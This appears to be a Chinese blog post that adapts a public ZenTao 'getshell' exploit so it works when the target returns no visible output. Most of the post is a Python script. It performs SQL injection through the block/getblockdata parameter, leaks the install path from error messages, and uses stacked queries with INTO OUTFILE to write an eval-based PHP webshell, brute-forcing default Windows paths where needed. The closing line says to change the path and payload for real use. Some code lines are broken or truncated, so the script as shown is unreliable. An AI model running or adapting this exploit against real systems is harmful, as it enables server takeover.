这里不做具体显示,仅修改一下exp,以检测poc无回显的状态
jas502n/zentao-getshell
发送该报错poc时候,通过报错获取服务路径,然后在对应目录下写入文件,如果遇到无回显状态时,无法进行下一步利用
{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}
直接通过fuzz的方式遍历默认路径,写入文件,当然了,要是存在phpinfo界面的话,获取到服务路径,直接写入即可。
coding=utf-8
import requests
import base64
import re
import sys
import random
import string
import json
from fake_useragent import UserAgent
banner = '''
usage: python exp.py http://127.0.0.1:81/
'''
print(banner)
def urlwrite(url,get_shell):
hex_str = get_shell.encode('hex')
payload1 = '''{"orderBy":"order limit 1;SET @SQL=0x%s;PREPARE pord FROM @SQL;EXECUTE pord;-- -","num":"1,1","type":"openedbyme"}''' % hex_str
getshell_url = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64.b64encode(
payload1)
headers = {
"Referer": "%s/zentao" %url,
"User-Agent": new_ua
}
r1 = requests.get(url=getshell_url, headers=headers)
if r1.status_code == 200:
webshell = url + "/zentao/" + filename
r2 = requests.get(url=webshell)
if r2.status_code == 200 and 'aaa' in r1.content:
print("\n\n>>>>Webshell: \n%s" % webshell)
else:
print("写入失败")
else:
print("写入失败")
def get_web_dir(url, filename):
if url[-1] == '/':
url = url[:-1]
else:
url = url
payload = '''{"orderBy":"order limit 1,1'","num":"1,1","type":"openedbyme"}'''
base64encode_str = base64.b64encode(payload)
web_dir = url + "/zentao/index.php?m=block&f=main&mode=getblockdata&blockid=case¶m=" + base64encode_str
version_url = url + "/zentao/index.php?mode=getconfig"
r0 = requests.get(url=version_url)
json_str = json.loads(r0.text)
print("Cuurent Version= " + json_str['version'])
headers = {
"Referer": "http://127.0.0.1:81/zentao",
"User-Agent": new_ua
}
r = requests.get(url=web_dir, headers=headers)
if r.status_code == 200 and 'SELECT' in r.content:
print('\n')
m = re.compile(r'.*in (.*) on')
www_dir = m.findall(r.content)[0]
www_root = www_dir.replace('\\', "//")
print(www_root)
m = re.compile(r'(.*)framework', re.DOTALL)
print '>>>>WWWROOT INSTALL: ' +
get_shell = "select '<?php echo 'aaa';?>' into outfile '%s'" % (
m.findall(www_root)[0] + 'www//' + filename)
print('\n%s\n' % get_shell)
elif r.status_code == 200:
for i in ["C","D","E"]:
get_shell = "select '<?php @eval($_POST[1])?>' into outfile %s:\\zentao\\xampp\\zentao\\www\\%s" %(i,filename)
print('\n%s\n' %get_shell)
else:
print("出错")
urlwrite(url,get_shell)
if __name__ == "__main__":
url = sys.argv[1]
characters = string.ascii_lowercase + string.digits
filename = random_string = ''.join(random.choice(characters) for _ in range(5))
ua = UserAgent()
new_ua = ua.random
if url:
get_web_dir(url, filename)
else:
print("url为空")
适当修改,只是检测脚本,实际中,修改路径,修改写入的文件即可
